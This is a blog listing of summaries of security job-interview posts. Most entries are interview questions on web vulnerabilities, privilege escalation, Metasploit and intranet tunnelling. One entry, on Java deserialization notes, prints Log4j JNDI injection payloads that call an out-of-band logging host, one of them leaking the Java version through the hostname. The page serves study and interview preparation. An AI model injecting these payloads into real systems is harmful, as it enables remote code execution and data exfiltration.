随笔分类 -  面试

中电安科一、二面
发表于 2023-09-13 23:32阅读:104评论:0推荐:0
摘要:蛮简单的,拿下offer 中电安科一面 这是一家偏向工控的安全公司 自我介绍 web比较熟的漏洞有哪些?最熟的是哪个? 文件上传呢? 反序列化漏洞了解过吗? 提权接触过吗? 协议通信了解过吗? 你对工控安全有了解吗? 对病毒有多什么研究吗? 可以介绍一下XSS吗? 拒绝服务攻击和分布式拒绝服务攻击有 阅读全文 »
posted @ 2023-09-13 23:32 LinkPoc 阅读(104) 评论(0) 推荐(0) 编辑
360安全研究一、二面
发表于 2023-09-12 18:24阅读:136评论:0推荐:0
摘要:360安全研究一面 ps:中间一半的时候才开始录的,整理了一下后半段的面试问题。中间一半的时候才开始录的,整理了一下后半段的面试问题。 自我介绍 sqlmap针对时间盲注该用什么参数? MSF使用上的流程? 你经常用MSF的用来做什么? 内网里不出网,如何搭建隧道? 如果说内网里拿到层层主机,如何配 阅读全文 »
posted @ 2023-09-12 18:24 LinkPoc 阅读(136) 评论(0) 推荐(0) 编辑
关于面试常问到的几种Java反序列化
发表于 2023-09-08 17:50阅读:394评论:0推荐:0
摘要:更新一下笔记中JAVA的几个知名的反序列化漏洞,仅漏洞poc和原理,无分析过程。 Log4j 条件:出网(因为需要请求jndi服务器) ${jndi:ldap://yuvs2b.ceye.io} //外带请求 ${jndi:ldap://${java:version}.f2478a5a.ipv6.1 阅读全文 »
posted @ 2023-09-08 17:50 LinkPoc 阅读(394) 评论(0) 推荐(0) 编辑
230323美团应用安全部门一面
发表于 2023-05-11 15:07阅读:137评论:0推荐:0
摘要:之前忘了发,整理了一下美团一面的面试题 ps:一面就寄了QAQ 自我介绍 询问实习经历 为什么接触网络安全? 你们俱乐部是怎么学习分享的? 都挖到过什么漏洞? 重放,并发漏洞的原理? ssrf怎么利用? redis拿shell方法? 常见的加密方式? 对称加密和非对称加密比如哪些? ssrf绕过方法 阅读全文 »
posted @ 2023-05-11 15:07 LinkPoc 阅读(137) 评论(0) 推荐(0) 编辑
230227安恒安服一面
发表于 2023-02-27 22:32阅读:95评论:0推荐:0
摘要:230227安恒安服一面 常规的渗透测试流程? src目前提交过什么漏洞?收入有五位数了吗?挖多久了? 你接触网络安全是出于兴趣还是学校的课程? CTF你主要打的方向是什么方向? 你运营公众号都写过什么文章? 你之前做过代码审计这块吗? 内网渗透这块你在实战中打过吗? windows常规提权? 数据 阅读全文 »
posted @ 2023-02-27 22:32 LinkPoc 阅读(95) 评论(0) 推荐(0) 编辑
某whale模拟面试
发表于 2022-01-30 18:32阅读:145评论:0推荐:0
摘要:whale3070的模拟面试语录 B站回放地址 https://www.bilibili.com/video/BV1ar4y1e7Cm 我叫xx,就读于xx学校,大二,学习web安全有x年时间了,xxxx(介绍自己) 嗯,好。那我先问一些基础题,看你的基础扎实不扎实. 你知道TCP和UDP有什么区别 阅读全文 »
posted @ 2022-01-30 18:32 LinkPoc 阅读(145) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示